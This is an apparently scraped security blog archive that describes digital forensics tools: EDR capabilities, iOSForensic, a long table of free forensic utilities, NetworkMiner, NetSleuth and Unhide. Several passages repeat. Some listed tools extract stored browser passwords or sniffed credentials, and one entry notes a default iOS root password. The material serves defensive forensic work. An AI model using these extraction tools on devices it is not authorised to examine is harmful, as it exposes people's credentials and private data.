Forensics Investigation of Ping Command
Reviewed by 0x000216
on
Monday, January 27, 2020
Rating: 5
srum-dump – A Forensics Tool to Convert the Data in the Windows srum
Reviewed by 0x000216
on
Wednesday, January 01, 2020
Rating: 5
awesome-forensics
Reviewed by 0x000216
on
Wednesday, January 01, 2020
Rating: 5
Learn Network Forensics - Absolute great list of resources, training, etc. - FREE
Reviewed by 0x000216
on
Friday, February 01, 2019
Rating: 5
AboutDFIR.com – The Definitive Compendium Project Digital Forensics & Incident Response
Reviewed by 0x000216
on
Monday, January 21, 2019
Rating: 5
Let Me Pick Your Brain - Remote Forensics in Hardened Environments
Reviewed by 0x000216
on
Saturday, June 30, 2018
Rating: 5
Forensics
"Como resultado, as tecnologias que facilitam a busca e análise rápidas de evidências em sistemas 'vivos' começaram a florescer na última década e formaram a base do que é conhecido como mercado de detecção e resposta de endpoint", disse ele. Os produtos EDR normalmente oferecem alguma combinação dos seguintes recursos:
Gravação contínua de telemetria de pontos-chave - como processos executados ou conexões de rede - para fornecer um cronograma prontamente disponível de atividade em um sistema. Isso é análogo a um gravador de caixa preta em um avião, ele disse. O acesso a essa telemetria alivia a necessidade de reconstruir os eventos históricos através das fontes nativas de evidência de um sistema. Pode ser menos útil nos casos em que a tecnologia de investigação é implantada em um ambiente depois que uma violação já ocorreu.
Análise e pesquisa das fontes forenses de evidência de um sistema - isto é, o que é preservado pelo sistema operacional por conta própria durante as operações normais do sistema. Isso inclui a capacidade de executar buscas rápidas e direcionadas para arquivos, processos, entradas de log, artefatos na memória e outras evidências em sistemas em escala. Ele complementa o uso de um gravador de eventos contínuo e pode ser usado para ampliar o escopo de uma investigação e encontrar leads adicionais que de outra forma não poderiam ter sido preservados.
Alerta e detecção. Os produtos podem coletar e analisar proativamente as fontes de dados citadas acima e compará-las com inteligência estruturada de ameaças (como Indicadores de Compromisso), regras ou outras heurísticas destinadas a detectar atividades maliciosas.
Coleta de evidências de hospedeiros individuais. À medida que os investigadores identificam sistemas que necessitam de uma inspecção mais aprofundada, podem conduzir colecções e análises de dados de "mergulho profundo" através da totalidade da telemetria histórica de um sistema sujeito (se presente e gravado), ficheiros no disco e na memória. A maioria das organizações preferem realizar análises remotas e triagem de sistemas ao vivo, em vez de imagens forenses abrangentes sempre que possível, disse ele.
http://www.itworld.com/article/3192348/security/computer-forensics-follows-the-bread-crumbs-left-by-perpetrators.html
Gravação contínua de telemetria de pontos-chave - como processos executados ou conexões de rede - para fornecer um cronograma prontamente disponível de atividade em um sistema. Isso é análogo a um gravador de caixa preta em um avião, ele disse. O acesso a essa telemetria alivia a necessidade de reconstruir os eventos históricos através das fontes nativas de evidência de um sistema. Pode ser menos útil nos casos em que a tecnologia de investigação é implantada em um ambiente depois que uma violação já ocorreu.
Análise e pesquisa das fontes forenses de evidência de um sistema - isto é, o que é preservado pelo sistema operacional por conta própria durante as operações normais do sistema. Isso inclui a capacidade de executar buscas rápidas e direcionadas para arquivos, processos, entradas de log, artefatos na memória e outras evidências em sistemas em escala. Ele complementa o uso de um gravador de eventos contínuo e pode ser usado para ampliar o escopo de uma investigação e encontrar leads adicionais que de outra forma não poderiam ter sido preservados.
Alerta e detecção. Os produtos podem coletar e analisar proativamente as fontes de dados citadas acima e compará-las com inteligência estruturada de ameaças (como Indicadores de Compromisso), regras ou outras heurísticas destinadas a detectar atividades maliciosas.
Coleta de evidências de hospedeiros individuais. À medida que os investigadores identificam sistemas que necessitam de uma inspecção mais aprofundada, podem conduzir colecções e análises de dados de "mergulho profundo" através da totalidade da telemetria histórica de um sistema sujeito (se presente e gravado), ficheiros no disco e na memória. A maioria das organizações preferem realizar análises remotas e triagem de sistemas ao vivo, em vez de imagens forenses abrangentes sempre que possível, disse ele.
http://www.itworld.com/article/3192348/security/computer-forensics-follows-the-bread-crumbs-left-by-perpetrators.html
Forensics
Reviewed by 0x000216
on
Monday, May 08, 2017
Rating: 5
OWASP iOSForensic - Tool to help in forensics analysis on iOS
OWASP iOSForensic is a python tool to help in forensics analysis on iOS.
It get files, logs, extract sqlite3 databases and uncompress .plist files in xml.
OWASP iOSForensic provides:
- Application's files
- Conversion of .plist files in XML
- Extract all databases
- Conversion of binary cookies
- Application's logs
- A List of all packages
- Extraction multiple packages
Options
- -h --help : show help message
- -a --about : show informations
- -v --verbose : verbose mode
- -i --ip : local ip address of the iOS terminal
- -p --port : ssh port of the iOS terminal (default 22)
- -P --password : root password of the iOS terminal (default alpine)
Examples:
./iOSForensic.py -i 192.168.1.10 [OPTIONS] APP_NAME.app INCOMPLETE_APP_NAME APP_NAME2_WITHOUT_DOT_APP
./iOSForensic.py -i 192.168.1.10 -p 1337 -P pwd MyApp.app angry MyApp2
OWASP iOSForensic - Tool to help in forensics analysis on iOS
Reviewed by 0x000216
on
Wednesday, July 02, 2014
Rating: 5
Collection Of Free Computer Forensic Tools
Disk tools and data capture
|
|
|
---|---|---|
DumpIt | MoonSols | Generates physical memory dump of Windows machines, 32 bits 64 bit. Can run from a USB flash drive. |
EnCase Forensic Imager | Guidance Software | Create EnCase evidence files and EnCase logical evidence files [direct download link] |
Encrypted Disk Detector* | Magnet Forensics | Checks local physical drives on a system for TrueCrypt, PGP, or Bitlocker encrypted volumes |
EWF MetaEditor | 4Discovery | Edit EWF (E01) meta data, remove passwords (Encase v6 and earlier) |
FAT32 Format | Ridgecrop | Enables large capacity disks to be formatted as FAT32 |
Forensics Acquisition of Websites | Web Content Protection Association | Browser designed to forensically capture web pages |
FTK Imager* | AccessData | Imaging tool, disk viewer and image mounter |
Guymager | vogu00 | Multi-threaded GUI imager under running under Linux |
HotSwap | Kazuyuki Nakayama | Safely remove SATA disks similar to the “Safely Remove Hardware” icon in the notification area |
LiveView | CERT | Allows examiner to boot dd images in VMware. |
P2 Explorer Free | Paraben | Mount forensic images as read-only local logical and physical disks |
Live RAM Capturer* | Belkasoft | Extracts RAM dump including that protected by an anti-debugging or anti-dumping system. 32 and 64 bit builds |
OSFClone | Passmark Software | Boot utility for CD/DVD or USB flash drives to create dd or AFF images/clones. |
OSFMount | Passmark Software | Mounts a wide range of disk images. Also allows creation of RAM disks |
Tableau Imager* | Tableau | Imaging tool for use with Tableau imaging products |
VHD Tool | Microsoft | Converts raw disk images to VHD format which are mountable in Windows Disk Management |
Email analysis
|
|
|
---|---|---|
EDB Viewer | Lepide Software | Open and view (not export) Outlook EDB files without an Exchange server |
Mail Viewer | MiTeC | Viewer for Outlook Express, Windows Mail/Windows Live Mail, Mozilla Thunderbird message databases and single EML files |
OST Viewer | Lepide Software | Open and view (not export) Outlook OST files without connecting to an Exchange server |
PST Viewer | Lepide Software | Open and view (not export) Outlook PST files without needing Outlook |
General
|
|
|
---|---|---|
Agent Ransack | Mythicsoft | Search multiple files using Boolean operators and Perl Regex |
CaseNotes Lite | Blackthorn | Contemporaneous notes recorder |
Computer Forensic Reference Data Sets | NIST | Collated forensic images for training, practice and validation |
EvidenceMover* | Nuix | Copies data between locations, with file comparison, verification, logging |
FastCopy | Shirouzu Hiroaki | Self labelled ‘fastest’ copy/delete Windows software. Can verify with SHA-1, etc. |
File Signatures | Gary Kessler | Table of file signatures |
HashMyFiles | Nirsoft | Calculate MD5 and SHA1 hashes |
MobaLiveCD | Mobatek | Run Linux live CDs from their ISO image without having to boot to them |
Mouse Jiggler | Arkane Systems | Automatically moves mouse pointer stopping screen saver, hibernation etc. |
Notepad ++ | Notepad ++ | Advanced Notepad replacement |
NSRL | NIST | Hash sets of ‘known’ (ignorable) files |
Quick Hash | Ted Technology | A Linux & Windows GUI for individual and recursive SHA1 hashing of files |
USB Write Blocker | DSi | Enables software write-blocking of USB ports |
USB Write Blocker | Sécurité Multi-Secteurs | Software write blocker for Windows XP through to Windows 8 |
Windows Forensic Environment | Troy Larson | Guide by Brett Shavers to creating and working with a Windows boot CD |
File and data analysis
|
|
|
---|---|---|
Advanced Prefetch Analyser | Allan Hay | Reads Windows XP,Vista and Windows 7 prefetch files |
analyzeMFT | David Kovar | Parses the MFT from an NTFS file system allowing results to be analysed with other tools |
Defraser | Various | Detects full and partial multimedia files in unallocated space |
eCryptfs Parser | Ted Technology | Recursively parses headers of every eCryptfs file in selected directory. Outputs encryption algorithm used, original file size, signature used, etc. |
Encryption Analyzer | Passware | Scans a computer for password-protected & encrypted files, reports encryption complexity and decryption options for each file |
ExifTool | Phil Harvey | Read, write and edit Exif data in a large number of file types |
Forensic Image Viewer | Sanderson Forensics | View various picture formats, image enhancer, extraction of embedded Exif, GPS data |
Highlighter | Mandiant | Examine log files using text, graphic or histogram views |
Link Parser | 4Discovery | Recursively parses folders extracting 30+ attributes from Windows .lnk (shortcut) files |
LiveContactsView | Nirsoft | View and export Windows Live Messenger contact details |
RSA Netwitness Investigator* | EMC | Network packet capture and analysis |
Memoryze | Mandiant | Acquire and/or analyse RAM images, including the page file on live systems |
MetaExtractor | 4Discovery | Recursively parses folders to extract meta data from MS Office, OpenOffice and PDF files |
MFTview | Sanderson Forensics | Displays and decodes contents of an extracted MFT file |
NetSleuth | NetGrab | Network monitoring tool, with covert “silent port scanning” |
PictureBox | Mike’s Forensic Tools | Lists EXIF, and where available, GPS data for all photographs present in a directory. Export data to .xls or Google Earth KML format |
PsTools | Microsoft | Suite of command-line Windows utilities |
Shadow Explorer | Shadow Explorer | Browse and extract files from shadow copies |
Simple File Parser | Chris Mayhew | GUI tool for parsing .lnk files, prefetch and jump list artefacts |
SQLite Manager | Mrinal Kant, Tarakant Tripathy | Firefox add-on enabling viewing of any SQLite database |
Strings | Microsoft | Command-line tool for text searches |
Structured Storage Viewer | MiTec | View and manage MS OLE Structured Storage based files |
Switch-a-Roo | Mike’s Forensic Tools | Text replacement/converter/decoder for when dealing with URL encoding, etc |
Windows File Analyzer | MiTeC | Analyse thumbs.db, Prefetch, INFO2 and .lnk files |
Mac OS tools
|
|
|
---|---|---|
Audit | Twocanoes Software | Audit Preference Pane and Log Reader for OS X |
Disk Arbitrator | Aaron Burghardt | Blocks the mounting of file systems, complimenting a write blocker in disabling disk arbitration |
Epoch Converter* | Blackbag Technologies | Converts epoch times to local time and UTC |
FTK Imager CLI for Mac OS* | AccessData | Command line Mac OS version of AccessData’s FTK Imager |
IORegInfo | Blackbag Technologies | Lists items connected to the computer (e.g., SATA, USB and FireWire Drives, software RAID sets). Can locate partition information, including sizes, types, and the bus to which the device is connected |
Mac Memory Reader | Cyber Marshal | Command-line utility to capture physical RAM from Mac OS systems |
PMAP Info* | Blackbag Technologies | Displays the physical partitioning of the specified device. Can be used to map out all the drive information, accounting for all used sectors |
Mobile devices
|
|
|
---|---|---|
iPhone Analyzer | Leo Crawford, Mat Proud | Explore the internal file structure of Pad, iPod and iPhones |
ivMeta | Robin Wood | Extracts phone model and software version and created date and GPS data from iPhone videos. |
Rubus* | CCL Forensics | Deconstructs Blackberry .ipd backup files |
SAFT | SignalSEC Corp | Obtain SMS Messages, call logs and contacts from Android devices |
WhatsApp Forensics | Zena Forensics | Extract WhatApp messages from iOS and Android backups |
Data analysis suites
|
|
|
---|---|---|
Autopsy | Brian Carrier | Graphical interface to the command line digital investigation analysis tools in The Sleuth Kit (see below) |
Backtrack | Backtrack | Penetration testing and security audit with forensic boot capability |
Caine | Nanni Bassetti | Linux based live CD, featuring a number of analysis tools |
Deft | Dr. Stefano Fratepietro and others | Linux based live CD, featuring a number of analysis tools |
Digital Forensics Framework | ArxSys | Analyses volumes, file systems, user and applications data, extracting metadata, deleted and hidden items |
Forensic Scanner | Harlan Carvey | Automates ‘repetitive tasks of data collection’. Fuller description here |
Paladin* | Sumuri | Ubuntu based live boot CD for imaging and analysis |
SIFT* | SANS | VMware Appliance pre-configured with multiple tools allowing digital forensic examinations |
The Sleuth Kit | Brian Carrier | Collection of UNIX-based command line file and volume system forensic analysis tools |
Ubuntu guide | How-To Geek | Guide to using an Unbuntu live disk to recover partitions, carve files, etc. |
Volatility Framework | Volatile Systems | Collection of tools for the extraction of artefacts from RAM |
File viewers
|
|
|
---|---|---|
Microsoft PowerPoint 2007 Viewer | Microsoft | View PowerPoint presentations |
Microsoft Visio 2010 Viewer | Microsoft | View Visio diagrams |
VLC | VideoLAN | View most multimedia files and DVD, Audio CD, VCD, etc. |
Internet analysis
|
|
|
---|---|---|
Chrome Session Parser | CCL Forensics | Python module for performing off-line parsing of Chrome session files (“Current Session”, “Last Session”, “Current Tabs”, “Last Tabs”) |
ChromeCacheView | Nirsoft | Reads the cache folder of Google Chrome Web browser, and displays the list of all files currently stored in the cache |
Cookie Cutter | Mike’s Forensic Tools | Extracts embedded data held within Google Analytics cookies. Shows search terms used as well as dates of and the number of visits. |
Dumpzilla | Busindre | Runs in Python 3.x, extracting forensic information from Firefox, Iceweasel and Seamonkey browsers. See manual for more information. |
Facebook Profile Saver | Belkasoft | Captures information publicly available in Facebook profiles. |
IECookiesView | Nirsoft | Extracts various details of Internet Explorer cookies |
IEPassView | Nirsoft | Extract stored passwords from Internet Explorer versions 4 to 8 |
MozillaCacheView | Nirsoft | Reads the cache folder of Firefox/Mozilla/Netscape Web browsers |
MozillaCookieView | Nirsoft | Parses the cookie folder of Firefox/Mozilla/Netscape Web browsers |
MozillaHistoryView | Nirsoft | Reads the history.dat of Firefox/Mozilla/Netscape Web browsers, and displays the list of all visited Web page |
MyLastSearch | Nirsoft | Extracts search queries made with popular search engines (Google, Yahoo and MSN) and social networking sites (Twitter, Facebook, MySpace) |
PasswordFox | Nirsoft | Extracts the user names and passwords stored by Mozilla Firefox Web browser |
OperaCacheView | Nirsoft | Reads the cache folder of Opera Web browser, and displays the list of all files currently stored in the cache |
OperaPassView | Nirsoft | Decrypts the content of the Opera Web browser password file, wand.dat |
Web Historian | Mandiant | Reviews list of URLs stored in the history files of the most commonly used browsers |
Web Page Saver* | Magnet Forensics | Takes list of URLs saving scrolling captures of each page. Produces HTML report file containing the saved pages |
Registry analysis
|
|
|
---|---|---|
ForensicUserInfo | Woanware | Extracts user information from the SAM, SOFTWARE and SYSTEM hives files and decrypts the LM/NT hashes from the SAM file |
Process Monitor | Microsoft | Examine Windows processes and registry threads in real time |
Registry Decoder | US National Institute of Justice, Digital Forensics Solutions | For the acquisition, analysis, and reporting of registry contents |
RegRipper | Harlan Carvey | Registry data extraction and correlation tool |
Regshot | Regshot | Takes snapshots of the registry allowing comparisons e.g., show registry changes after installing software |
sbag | TZWorks | Extracts data from Shellbag entries |
USB Device Forensics | Woanware | Details previously attached USB devices on exported registry hives |
USB Historian | 4Discovery | Displays 20+ attributes relating to USB device use on Windows systems |
USBDeview | Nirsoft | Details previously attached USB devices |
User Assist Analysis | 4Discovery | Extracts SID, User Names, Indexes, Application Names, Run Counts, Session, and Last Run Time Attributes from UserAssist keys |
UserAssist | Didier Stevens | Displays list of programs run, with run count and last run date and time |
Windows Registry Recovery | MiTec | Extracts configuration settings and other information from the Registry |
Application analysis
|
|
|
---|---|---|
Dropbox Decryptor* | Magnet Forensics | Decrypts the Dropbox filecache.dbx file which stores information about files that have been synced to the cloud using Dropbox |
Google Maps Tile Investigator* | Magnet Forensics | Takes x,y,z coordinates found in a tile filename and downloads surrounding tiles providing more context |
KaZAlyser | Sanderson Forensics | Extracts various data from the KaZaA application |
LiveContactsView | Nirsoft | View and export Windows Live Messenger contact details |
SkypeLogView | Nirsoft | View Skype calls and chats |
Abandonware
|
|
|
---|---|---|
DCode | Digital Detective | Converts various data types to date/time values |
iPhone Backup Browser | Rene Devichi | View unencrypted backups of iPad, iPod and iPhones |
ChromeAnalysis | Foxton Software | Analysis of internet history data generated using Google Chrome |
IEHistoryView | Nirsoft | Extracts recently visited Internet Explorer URLs |
Collection Of Free Computer Forensic Tools
Reviewed by 0x000216
on
Tuesday, February 04, 2014
Rating: 5
[OS X Auditor] free Mac OS X computer forensics tool
OS X Auditor parses and hashes the following artifacts on the running system or a copy of a system you want to analyze:
- the kernel extensions
- the system agents and daemons
- the third party's agents and daemons
- the old and deprecated system and third party's startup items
- the users' agents
- the users' downloaded files
- the installed applications
It extracts:
- the users' quarantined files
- the users' Safari history, downloads, topsites, HTML5 databases and localstore
- the users' Firefox cookies, downloads, formhistory, permissions, places and signons
- the users' Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage
- the users' social and email accounts
- the WiFi access points the audited system has been connected to (and tries to geolocate them)
It also looks for suspicious keywords in the .plist themselves.
It can verify the reputation of each file on:
- Team Cymru's MHR
- VirusTotal
- Malware.lu
- your own local database
It can aggregate all logs from the following directories into a zipball:
- /var/log (-> /private/var/log)
- /Library/logs
- the user's ~/Library/logs
Finally, the results can be:
- rendered as a simple txt log file (so you can cat-pipe-grep in them… or just grep)
- rendered as a HTML log file
- sent to a Syslog server
[OS X Auditor] free Mac OS X computer forensics tool
Reviewed by 0x000216
on
Monday, September 16, 2013
Rating: 5
[NetworkMiner v1.4.1] Network Forensic Analysis Tool (NFAT)
NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows (but also works in Linux / Mac OS X / FreeBSD).
NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network.
NetworkMiner can also parse PCAP files for off-line analysis and to regenerate/reassemble transmitted files and certificates from PCAP files.
A professional edition of NetworkMiner is available for purchase from NETRESEC
The free edition is available here: NetworkMiner_1-4-1.zip.
NetworkMiner collects data (such as forensic evidence) about hosts on the network rather than to collect data regarding the traffic on the network. The main user interface view is host centric (information grouped per host) rather than packet centric (information showed as a list of packets/frames).
NetworkMiner can extract files and certificates transferred over the network by parsing a PCAP file or by sniffing traffic directly from the network. This functionality can be used to extract and save media files (such as audio or video files) which are streamed across a network from websites such as YouTube. Supported protocols for file extraction are FTP, TFTP, HTTP and SMB.
User credentials (usernames and passwords) for supported protocols are extracted by NetworkMiner and displayed under the “Credentials” tab. The credentials tab sometimes also show information that can be used to identify a particular person, such as user accounts for popular online services like Gmail or Facebook.
NetworkMiner Professional USB flash drive
Another very useful feature is that the user can search sniffed or stored data for keywords. NetworkMiner allows the user to insert arbitrary string or byte-patterns that shall be searched for with the keyword search functionality.
[NetworkMiner v1.4.1] Network Forensic Analysis Tool (NFAT)
Reviewed by 0x000216
on
Wednesday, February 20, 2013
Rating: 5
NetSleuth : Open source Network Forensics And Analysis Tools
NetSleuth identifies and fingerprints network devices by silent network monitoring or by processing data from PCAP files.
NetSleuth is an opensource network forensics and analysis tool, designed for triage in incident response situations. It can identify and fingerprint network hosts and devices from pcap files captured from Ethernet or WiFi data (from tools like Kismet).
It also includes a live mode, silently identifying hosts and devices without needing to send any packets or put the network adapters into promiscuous mode ("silent portscanning").
NetSleuth is a free network monitoring, cyber security and network forensics analysis (NFAT) tool that provides the following features:
An easy realtime overview of what devices and what people are connected to any WiFi or Ethernet network.
Free. The tool can be downloaded for free, and the source code is available under the GPL.
Simple and cost effective. No requirement for hardware or reconfiguration of networks.
“Silent portscanning” and undetectable network monitoring on WiFi and wired networks.
Automatic identification of a vast array of device types, including smartphones, tablets, gaming consoles, printers, routers, desktops and more.
Offline analysis of pcap files, from tools like Kismet or tcpdump, to aid in intrusion response and network forensics.
Download NetSleuth -
Requirements
Perform a full installation of Wireshark on your machine.
Specifically the tshark program (this is installed by default).
NetSleuth is an opensource network forensics and analysis tool, designed for triage in incident response situations. It can identify and fingerprint network hosts and devices from pcap files captured from Ethernet or WiFi data (from tools like Kismet).
It also includes a live mode, silently identifying hosts and devices without needing to send any packets or put the network adapters into promiscuous mode ("silent portscanning").
NetSleuth is a free network monitoring, cyber security and network forensics analysis (NFAT) tool that provides the following features:
An easy realtime overview of what devices and what people are connected to any WiFi or Ethernet network.
Free. The tool can be downloaded for free, and the source code is available under the GPL.
Simple and cost effective. No requirement for hardware or reconfiguration of networks.
“Silent portscanning” and undetectable network monitoring on WiFi and wired networks.
Automatic identification of a vast array of device types, including smartphones, tablets, gaming consoles, printers, routers, desktops and more.
Offline analysis of pcap files, from tools like Kismet or tcpdump, to aid in intrusion response and network forensics.
Download NetSleuth -
Requirements
Perform a full installation of Wireshark on your machine.
Specifically the tshark program (this is installed by default).
The current version of NetSleuth is 1.61.
NetSleuth : Open source Network Forensics And Analysis Tools
Reviewed by 0x000216
on
Monday, February 18, 2013
Rating: 5
Unhide - forensic tool to find hidden processes and TCP/UDP ports by rootkits / LKMs or by another hiding technique
Unhide is a forensic tool to find hidden processes and TCP/UDP ports by rootkits / LKMs
or by another hiding technique.
Unhide (unhide-linux or unhide-posix)
Features -
Detecting hidden processes. Implements six main techniques
1- Compare /proc vs /bin/ps output
2- Compare info gathered from /bin/ps with info gathered by walking thru the procfs. ONLY for unhide-linux version
3- Compare info gathered from /bin/ps with info gathered from syscalls (syscall scanning).
4- Full PIDs space ocupation (PIDs bruteforcing). ONLY for unhide-linux version
5- Compare /bin/ps output vs /proc, procfs walking and syscall. ONLY for unhide-linux version
Reverse search, verify that all thread seen by ps are also seen in the kernel.
6- Quick compare /proc, procfs walking and syscall vs /bin/ps output. ONLY for unhide-linux version
It's about 20 times faster than tests 1+2+3 but maybe give more false positives.
Unhide_rb
It's a back port in C language of the ruby unhide.rb
As the original unhide.rb, it is roughly equivalent to "unhide-linux quick reverse" :
- it makes three tests less (kill, opendir and chdir),
- it only run /bin/ps once at start and once for the double check,
- also, its tests are less accurate (e.g.. testing return value instead of errno),
- processes are only identified by their exe link (unhide-linux also use cmdline and
"sleeping kernel process" name),
- there's little protection against failures (failed fopen or popen by example),
- there's no logging capability.
It is very quick, about 80 times quicker than "unhide-linux quick reverse"
Unhide-TCP
Identify TCP/UDP ports that are listening but not listed in sbin/ss or /bin/netstat.
It use two methods:
- brute force of all TCP/UDP ports availables and compare with SS/netstat output.
- probe of all TCP/UDP ports not reported by netstat.
Files
unhide-linux.c -- Hidden processes, for Linux >= 2.6
unhide-linux.h
unhide-tcp.c -- Hidden TCP/UDP Ports
unhide-tcp-fast.c
unhide-tcp.h
unhide-output.c -- Common routines of unhide tools
unhide-output.h
unhide_rb.c -- C port of unhide.rb (a very light version of unhide-linux in ruby)
unhide-posix.c -- Hidden processes, for generic Unix systems (*BSD, Solaris, linux 2.2 / 2.4)
It doesn't implement PIDs brute forcing check yet. Needs more testing
Warning : This version is somewhat outdated and may generate false positive.
Prefer unhide-linux.c if you can use it.
changelog -- As the name implied log of the change to unhide
COPYING -- License file, GNU GPL V3
LEEME.txt -- Spanish version of this file
LISEZ-MOI.TXT -- French version of this file
NEWS -- Release notes
README.txt -- This file
sanity.sh -- unhide-linux testsuite file
TODO -- Evolutions to do (any volunteers ?)
man/unhide.8 -- English man page of unhide
man/unhide-tcp.8 -- English man page of unhide-tcp
man/fr/unhide.8 -- French man page of unhide
man/fr/unhide-tcp.8 -- French man page of unhide-tcp
Compiling
If you ARE using a Linux kernel >= 2.6
gcc -Wall -O2 --static -pthread unhide-linux*.c unhide-output.c -o unhide-linux
gcc -Wall -O2 --static unhide_rb.c -o unhide_rb
gcc -Wall -O2 --static unhide-tcp.c unhide-tcp-fast.c unhide-output.c -o unhide-tcp
ln -s unhide unhide-linux
Else (Linux < 2.6, *BSD, Solaris and other Unice)
gcc --static unhide-posix.c -o unhide-posix
ln -s unhide unhide-posix
Using
You MUST be root to use unhide-linux and unhide-tcp.
Examples:
# ./unhide-linux -vo quick reverse
# ./unhide-linux -vom procall sys
# ./unhide_rb
# ./unhide-tcp -flov
# ./unhide-tcp -flovs
Download -
unhide-20121229.tgz
Download WinUnhide.zip (38.5 kB)
http://www.unhide-forensics.info
Screenshot-
or by another hiding technique.
Unhide (unhide-linux or unhide-posix)
Features -
Detecting hidden processes. Implements six main techniques
1- Compare /proc vs /bin/ps output
2- Compare info gathered from /bin/ps with info gathered by walking thru the procfs. ONLY for unhide-linux version
3- Compare info gathered from /bin/ps with info gathered from syscalls (syscall scanning).
4- Full PIDs space ocupation (PIDs bruteforcing). ONLY for unhide-linux version
5- Compare /bin/ps output vs /proc, procfs walking and syscall. ONLY for unhide-linux version
Reverse search, verify that all thread seen by ps are also seen in the kernel.
6- Quick compare /proc, procfs walking and syscall vs /bin/ps output. ONLY for unhide-linux version
It's about 20 times faster than tests 1+2+3 but maybe give more false positives.
Unhide_rb
It's a back port in C language of the ruby unhide.rb
As the original unhide.rb, it is roughly equivalent to "unhide-linux quick reverse" :
- it makes three tests less (kill, opendir and chdir),
- it only run /bin/ps once at start and once for the double check,
- also, its tests are less accurate (e.g.. testing return value instead of errno),
- processes are only identified by their exe link (unhide-linux also use cmdline and
"sleeping kernel process" name),
- there's little protection against failures (failed fopen or popen by example),
- there's no logging capability.
It is very quick, about 80 times quicker than "unhide-linux quick reverse"
Unhide-TCP
Identify TCP/UDP ports that are listening but not listed in sbin/ss or /bin/netstat.
It use two methods:
- brute force of all TCP/UDP ports availables and compare with SS/netstat output.
- probe of all TCP/UDP ports not reported by netstat.
Files
unhide-linux.c -- Hidden processes, for Linux >= 2.6
unhide-linux.h
unhide-tcp.c -- Hidden TCP/UDP Ports
unhide-tcp-fast.c
unhide-tcp.h
unhide-output.c -- Common routines of unhide tools
unhide-output.h
unhide_rb.c -- C port of unhide.rb (a very light version of unhide-linux in ruby)
unhide-posix.c -- Hidden processes, for generic Unix systems (*BSD, Solaris, linux 2.2 / 2.4)
It doesn't implement PIDs brute forcing check yet. Needs more testing
Warning : This version is somewhat outdated and may generate false positive.
Prefer unhide-linux.c if you can use it.
changelog -- As the name implied log of the change to unhide
COPYING -- License file, GNU GPL V3
LEEME.txt -- Spanish version of this file
LISEZ-MOI.TXT -- French version of this file
NEWS -- Release notes
README.txt -- This file
sanity.sh -- unhide-linux testsuite file
TODO -- Evolutions to do (any volunteers ?)
man/unhide.8 -- English man page of unhide
man/unhide-tcp.8 -- English man page of unhide-tcp
man/fr/unhide.8 -- French man page of unhide
man/fr/unhide-tcp.8 -- French man page of unhide-tcp
Compiling
If you ARE using a Linux kernel >= 2.6
gcc -Wall -O2 --static -pthread unhide-linux*.c unhide-output.c -o unhide-linux
gcc -Wall -O2 --static unhide_rb.c -o unhide_rb
gcc -Wall -O2 --static unhide-tcp.c unhide-tcp-fast.c unhide-output.c -o unhide-tcp
ln -s unhide unhide-linux
Else (Linux < 2.6, *BSD, Solaris and other Unice)
gcc --static unhide-posix.c -o unhide-posix
ln -s unhide unhide-posix
Using
You MUST be root to use unhide-linux and unhide-tcp.
Examples:
# ./unhide-linux -vo quick reverse
# ./unhide-linux -vom procall sys
# ./unhide_rb
# ./unhide-tcp -flov
# ./unhide-tcp -flovs
Download -
unhide-20121229.tgz
Download WinUnhide.zip (38.5 kB)
Current Stable Version:
--> 2012-12-29
[ Changelog ]
MPORTANT
- unhide-linux26.c was renamed to unhide-linux.c
- unhide.c was renamed to unhide-posix.c
- The log file of unhide-linux is renamed 'unhide-linux_AAAA-MM-DD.log'
- The log file of unhide-tcp is named 'unhide-tcp_AAAA-MM-DD.log'
- By default, unhide-tcp now use /sbin/ss from iproute2 package, to use netstat as before '-n' option must be given on command line.
- Display is more verbose and multi-lines for hidden processes (unhide-linux).
- If asked to (-l and/or -f), display is more verbose and multi-lines for hidden ports (unhide-tcp).
- sysinfo test is no more called as part of compound quick and sys tests as it may give false positives.
It could still be run using the checksysinfo, checksysinfo2 or checksysinfo3 command line parameter.
NEW FEATURES
- Major enhancement of unhide-tcp :
* Add capability to output a log file (unhide-tcp_AAA-MM-DD.log)
* Add capability to output more information (via lsof and/or fuser) on hidden port if available
* Add verbose mode (disabled by default) to display warning
* Add a new method (via option '-s') very fast on system with huge number of opened ports
* Make a double check of port access to avoid false positive (previous single check version is available as unhide-tcp-simple-check.c if needed).
- Add a quick port in C language of unhide.rb (unhide_rb.c) and guess what ... it's 40 times faster than original ruby unhide.rb
Note: unhide_rb doesn't take any option.
- Add "-d" option for doing a double check in brute test, this reduce false positives.
- Add "-o" option as synonym of "-f".
- For found hidden processes, display the user and the working directoryas extracted from the process environment.
Note that it doesn't work well for kernel processes/threads nor for daemons. - For found hidden processes, display cmdline, exe link and internal command name.
MISCELLANOUS
- Add french and spanish man page for unhide-tcp
- Update english manpage of unhide-tcp to reflect changes
- Minor corrections in french manpage of unhide
- Display copyright and license information in start banners.
- Make message from sysinfo tests more clear.
- Add a NEWS file :)
- Update README.txt, LISEZ-MOI.txt and LEEME.txt to clarify difference between
unhide-posix and unhide-linux.
- Remove sysinfo test from quick and sys compound tests as it may give false positive.
sysinfo test still can be used via the checksysinfo[2|3] command line parameters.
BUG FIXES
- Suppress pedantic compilation warnings (glibc >=2.3, gcc >=4.6).
- Correct the number of processes displayed for /proc counting in sysinfo test.
Source-
http://sourceforge.net/projects/unhide/http://www.unhide-forensics.info
Screenshot-
Unhide - forensic tool to find hidden processes and TCP/UDP ports by
rootkits / LKMs or by another hiding technique
Reviewed by 0x000216
on
Thursday, February 14, 2013
Rating: 5
[NetSleuth] Open source Network Forensics And Analysis Tools
NetSleuth identifies and fingerprints network devices by silent network monitoring or by processing data from PCAP files.
NetSleuth is an opensource network forensics and analysis tool, designed for triage in incident response situations. It can identify and fingerprint network hosts and devices from pcap files captured from Ethernet or WiFi data (from tools like Kismet).
NetSleuth is an opensource network forensics and analysis tool, designed for triage in incident response situations. It can identify and fingerprint network hosts and devices from pcap files captured from Ethernet or WiFi data (from tools like Kismet).
It also includes a live mode, silently identifying hosts and devices without needing to send any packets or put the network adapters into promiscuous mode ("silent portscanning").
NetSleuth is a free network monitoring, cyber security and network forensics analysis (NFAT) tool that provides the following features:
- An easy realtime overview of what devices and what people are connected to any WiFi or Ethernet network.
- Free. The tool can be downloaded for free, and the source code is available under the GPL.
- Simple and cost effective. No requirement for hardware or reconfiguration of networks.
- “Silent portscanning” and undetectable network monitoring on WiFi and wired networks.
